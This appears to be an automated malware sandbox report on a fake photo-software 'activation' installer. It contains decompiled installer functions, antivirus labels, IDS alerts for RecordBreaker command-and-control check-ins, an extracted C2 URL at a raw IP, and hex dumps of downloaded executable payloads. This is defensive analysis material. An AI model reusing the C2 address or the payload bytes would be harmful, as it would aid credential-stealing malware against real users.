Opcode Fuzzy Hash: d7c63457d166a350f53d970eb0409965f77a8d21c5a8cfae6addd8da613f3b75
Instruction Fuzzy Hash: A6119371A04244AFEB10DFA58C92AAEBBACEB49704F91407EF504E7281D7789D01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0049920C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
processCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0049920C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct _STARTUPINFOA _v76;
				struct _PROCESS_INFORMATION _v92;
				int _t20;
				intOrPtr _t26;
				intOrPtr _t38;
				void* _t44;

				_push(__edi);
				_v8 = 0;
				_t41 = __edx;
				_t29 = __eax;
				_push(_t44);
				_push(0x4992af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44 + 0xffffffa8;
				_push(0x4992c8);
				_push(__eax);
				_push(E004992D4);
				_push(__edx);
				E00403634();
				E00402934( &_v76, 0x44);
				_v76.cb = 0x44;
				_t20 = CreateProcessA(0, E00403738(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
				_t47 = _t20;
				if(_t20 == 0) {
					_t26 =  *0x49edfc; // 0x230ce04
					E00499164(_t26, _t29, 0, __edi, _t41, _t47);
				}
				CloseHandle(_v92.hThread);
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E004992B6);
				return E00403400( &_v8);
			}

0x00499214
0x00499217
0x0049921a
0x0049921c
0x00499220
0x00499221
0x00499226
0x00499229
0x0049922c
0x00499231
0x00499232
0x00499237
0x00499240
0x0049924f
0x00499254
0x0049927a
0x0049927f
0x00499281
0x00499283
0x00499288
0x00499288
0x00499291
0x0049929b
0x0049929e
0x004992a1
0x004992ae

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004992D4,?,004992C8,00000000,004992AF), ref: 0049927A
CloseHandle.KERNEL32(00499C9C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004992D4,?,004992C8,00000000), ref: 00499291

Part of subcall function 00499164: GetLastError.KERNEL32(00000000,004991FC,?,?,?,?), ref: 00499188

Strings

D, xrefs: 00499254

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: D
API String ID: 3798668922-2746444292
Opcode ID: 88c7c106073c59e43622e581ba34cc6405f60efbaf8114b77a08c1ff8f12a465
Instruction ID: 28a6660038b4d88ad00b798bd9ba61154fa8ff357054911c5ced557c69a1e98d
Opcode Fuzzy Hash: 88c7c106073c59e43622e581ba34cc6405f60efbaf8114b77a08c1ff8f12a465
Instruction Fuzzy Hash: B8015EB1604248BFDB00DB96CC42A9F7BACDF49714F51447AF504E72C1D6789E048A28

Uniqueness

Uniqueness Score: -1.00%

Function 0042E1F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E1F4(void* __eax, char* __edx) {
				int _v16;
				char _v20;
				long _t11;
				signed int _t12;
				signed int _t13;
				void* _t17;
				char* _t18;
				int _t19;

				_t18 = __edx;
				_t17 = __eax;
				_t13 = _t12 & 0xffffff00 | RegQueryValueExA(__eax, __edx, 0, 0, 0, 0) == 0x00000000;
				if(_t13 != 0 && (_t18 == 0 ||  *_t18 == 0) &&  *0x49c0dc != 2) {
					_t13 = 0;
					_t19 = 0;
					while(1) {
						_v16 = 2;
						_t11 = RegEnumValueA(_t17, _t19,  &_v20,  &_v16, 0, 0, 0, 0);
						if(_t11 != 0 && _t11 != 0xea) {
							goto L11;
						}
						if(_t11 != 0 || _v20 != 0) {
							_t19 = _t19 + 1;
							continue;
						} else {
							_t13 = 1;
						}
						goto L11;
					}
				}
				L11:
				return _t13;
			}

0x0042e1fa
0x0042e1fc
0x0042e20f
0x0042e214
0x0042e228
0x0042e22a
0x0042e22c
0x0042e22c
0x0042e248
0x0042e24f
0x00000000
0x00000000
0x0042e25a
0x0042e266
0x00000000
0x0042e262
0x0042e262
0x0042e262
0x00000000
0x0042e25a
0x0042e22c
0x0042e269
0x0042e270

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042E208
RegEnumValueA.ADVAPI32 ref: 0042E248

Strings

Inno Setup: No Icons, xrefs: 0042E206

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: bd0511ca20757f211e757699c0c9aa78b94ac5dafba73a7c2283d1bafa6b3c91
Instruction ID: a539eabee655ef144818f3097a210d44f5522b7a792cb7edb349fa40b75ec101
Opcode Fuzzy Hash: bd0511ca20757f211e757699c0c9aa78b94ac5dafba73a7c2283d1bafa6b3c91
Instruction Fuzzy Hash: 8C01DB3178D371E9F73545637D42B7B578C9B42B60F64027BF941BA2C0DA589C04927E

Uniqueness

Uniqueness Score: -1.00%

Function 0049A6E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0049A6E8(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t32;
				void* _t35;
				void* _t38;

				_t37 = __esi;
				_t36 = __edi;
				_t26 = __ebx;
				if( *((char*)(_t38 - 1)) != 0) {
					if( *0x49f010 != 0) {
						E004585A0("Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __ecx, __edi, __esi);
					} else {
						E004585A0("Restarting Windows.", __ebx, __ecx, __edi, __esi);
						 *0x49f48d = 1;
						if(E00455E14() == 0) {
							_t18 =  *0x49e62c; // 0x2252410
							SetForegroundWindow( *(_t18 + 0x20));
							_push(1);
							_push(1);
							_t21 =  *0x49ed80; // 0x230c388
							_push(E00403738(_t21));
							_t23 =  *0x49ed78; // 0x230c314
							_t24 = E00403738(_t23);
							_pop(_t35);
							E00481128(_t24, __ebx, 0x30, _t35, __edi, __esi);
						}
					}
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(E0049A78B);
				E00403420(_t38 - 0x34, 2);
				E00403A38(_t38 - 0x2c, _t26, 7, 0x40107c, _t36, _t37);
				return E00403400(_t38 - 8);
			}

0x0049a6e8
0x0049a6e8
0x0049a6e8
0x0049a6ec
0x0049a6f5
0x0049a74a
0x0049a6f7
0x0049a6fc
0x0049a701
0x0049a70f
0x0049a711
0x0049a71a
0x0049a71f
0x0049a721
0x0049a723
0x0049a72d
0x0049a72e
0x0049a733
0x0049a73d
0x0049a73e
0x0049a73e
0x0049a70f
0x0049a6f5
0x0049a751
0x0049a754
0x0049a757
0x0049a764
0x0049a776
0x0049a783

APIs

Part of subcall function 00455E14: GetCurrentProcess.KERNEL32(00000028), ref: 00455E23
Part of subcall function 00455E14: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00455E29

SetForegroundWindow.USER32(?), ref: 0049A71A

Strings

Restarting Windows., xrefs: 0049A6F7
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049A745

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
API String ID: 3179053593-4147564754
Opcode ID: bb6777940c6a50ae658ff3ebc4d9c8fd61fcf05fcdd40ee010721d59e4735647
Instruction ID: 5122ca49785e6841ab91457b0b89b6e488dcfd7854ae65d0270566c1c2237fbf
Opcode Fuzzy Hash: bb6777940c6a50ae658ff3ebc4d9c8fd61fcf05fcdd40ee010721d59e4735647
Instruction Fuzzy Hash: EA01D4746041446FEB01FBA5D842B5C2BE99B94309F50447BF400AB2D3DA7CD959875E

Uniqueness

Uniqueness Score: -1.00%

Function 0049AE88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0049AE88(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t1;
				int _t9;
				void* _t12;
				void* _t16;
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t21;

				_t16 = __edx;
				if( *0x49f555 != 0) {
					E004585A0("Detected restart. Removing temporary directory.", _t12, __ecx, _t18, _t19);
					_push(0x49aec3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t21;
					E0047F300();
					E0047EFD8(_t12, __ecx, _t16, _t18, _t19);
					_pop(_t17);
					 *[fs:eax] = _t17;
					E00457B24();
					_t9 =  *0x49d130; // 0x1
					return TerminateProcess(GetCurrentProcess(), _t9);
				}
				return _t1;
			}

0x0049ae88
0x0049ae95
0x0049ae9c
0x0049aea4
0x0049aea9
0x0049aeac
0x0049aeaf
0x0049aeb4
0x0049aebb
0x0049aebe
0x0049aed2
0x0049aed7
0x00000000
0x0049aee3
0x0049aeec

APIs

Part of subcall function 0047F300: FreeLibrary.KERNEL32(73C00000,00483DC7), ref: 0047F316

Part of subcall function 0047EFD8: GetTickCount.KERNEL32 ref: 0047F022

Part of subcall function 00457B24: SendMessageA.USER32 ref: 00457B43

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049B7DF), ref: 0049AEDD
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049B7DF), ref: 0049AEE3

Strings

Detected restart. Removing temporary directory., xrefs: 0049AE97

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 228b47364d40a631affd0c677e0885d1ddc7291000f615e4cc02e4ac91571499
Instruction ID: 3c913c32d0756031035703f4f4cddf398d0ed36f6509ee9f01125c758f9cf03b
Opcode Fuzzy Hash: 228b47364d40a631affd0c677e0885d1ddc7291000f615e4cc02e4ac91571499
Instruction Fuzzy Hash: DAE055722082843EDE0277A6BC1382B7F8CD34532D761047BF80481852D92C4820C27E

Uniqueness

Uniqueness Score: -1.00%

Function 00477208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00477208(void* __edx, intOrPtr _a4) {
				intOrPtr _t14;
				void* _t17;

				_t17 = CreateFileA(E00403738( *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) - 0x1c))), 0xc0000000, 0, 0, 1, 0x80, 0);
				if(_t17 == 0xffffffff) {
					E00453C98("CreateFile");
				}
				CloseHandle(_t17);
				_t14 =  *((intOrPtr*)(_a4 + 8));
				 *((char*)(_t14 - 0x21)) = 1;
				return _t14;
			}

0x00477232
0x00477237
0x0047723e
0x0047723e
0x00477244
0x0047724c
0x0047724f
0x00477255

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047743F), ref: 0047722D
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047743F), ref: 00477244

Part of subcall function 00453C98: GetLastError.KERNEL32(00000000,0045482D,00000005,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229,00000000), ref: 00453C9B

Strings

CreateFile, xrefs: 00477239

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 96b09a4e5d9e1a8f79d5c2eaa295b53471bf617f106a3b112787a0400d74c430
Instruction ID: 90e4e6ff62ef8f0e28f50a913bfb33107960128ee808bbf2bf0dc207e29e0456
Opcode Fuzzy Hash: 96b09a4e5d9e1a8f79d5c2eaa295b53471bf617f106a3b112787a0400d74c430
Instruction Fuzzy Hash: A6E06D306883447BEA20EA69DCC6F4A77889B04768F108152FA58AF3E3C5B9EC408658

Uniqueness

Uniqueness Score: -1.00%

Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403344() {

				E004032FC();
				 *0x49e014 = GetModuleHandleA(0);
				 *0x49e01c = GetCommandLineA();
				 *0x49e018 = 0xa;
				return 0x40309c;
			}

0x00403344
0x00403350
0x0040335b
0x00403361
0x00403370

APIs

GetModuleHandleA.KERNEL32(00000000,0049BA3A), ref: 0040334B
GetCommandLineA.KERNEL32(00000000,0049BA3A), ref: 00403356

Strings

(6\, xrefs: 0040335B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: (6\
API String ID: 2123368496-584991456
Opcode ID: 507b3439899aadcda4e4dd714f17469bdfd07b248e46d296d00f93cf4dba3756
Instruction ID: 98797e2be282b29c5dcb55f6b27639491d6d1699e35d5459d8823e2e9957d9fe
Opcode Fuzzy Hash: 507b3439899aadcda4e4dd714f17469bdfd07b248e46d296d00f93cf4dba3756
Instruction Fuzzy Hash: 72C002609012159AE750EF7758467152A949751349F80447FB104BE1E1D6BD82055BDE

Uniqueness

Uniqueness Score: -1.00%

Function 00455EA4 Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00455EA4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E004530E0(_t9, _v8, _t19);
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x00455ea4
0x00455eab
0x00455eae
0x00455eb2
0x00455eb5
0x00455f03
0x00455f03
0x00455f03
0x00455eb7
0x00455eb8
0x00455eba
0x00455eba
0x00455ebd
0x00455eca
0x00455ecd
0x00455ed3
0x00455ed3
0x00455ebf
0x00455ec3
0x00455ec3
0x00455edd
0x00455ee4
0x00000000
0x00000000
0x00455ee6
0x00455eee
0x00000000
0x00000000
0x00455ef0
0x00455ef8
0x00000000
0x00000000
0x00455efa
0x00455efb
0x00455efc
0x00000000
0x00000000
0x00000000
0x00455efc
0x00000000

APIs

Sleep.KERNEL32(?), ref: 00455EC3
Sleep.KERNEL32(?), ref: 00455ED3
GetLastError.KERNEL32 ref: 00455EE6
GetLastError.KERNEL32 ref: 00455EF0

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 6a5dd68216f633a44ec124f5b7bc5ae83bc60a54fdb172d1fd1805aed014b2ac
Instruction ID: 9465cf589d0d0c12c73eacd3b1eef521cbdc8b34a4c5067471d78d0fd9128cb0
Opcode Fuzzy Hash: 6a5dd68216f633a44ec124f5b7bc5ae83bc60a54fdb172d1fd1805aed014b2ac
Instruction Fuzzy Hash: 08F02B32B05A14774F20A7BB989357FA28CDE44376710512BFD04D7343D939DE4586A8

Uniqueness

Uniqueness Score: -1.00%

Source: 0.3.KbqArOlW06.exe.18de6818.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16726700.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16636690.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16866738.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.166866c8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.4:49778 -> 51.195.166.178:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 51.195.166.178:80 -> 192.168.2.4:49778

Source: Malware configuration extractor	URLs: http://51.195.166.178/
Source: Malware configuration extractor	URLs: http://51.195.166.178/

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:13 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:15 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 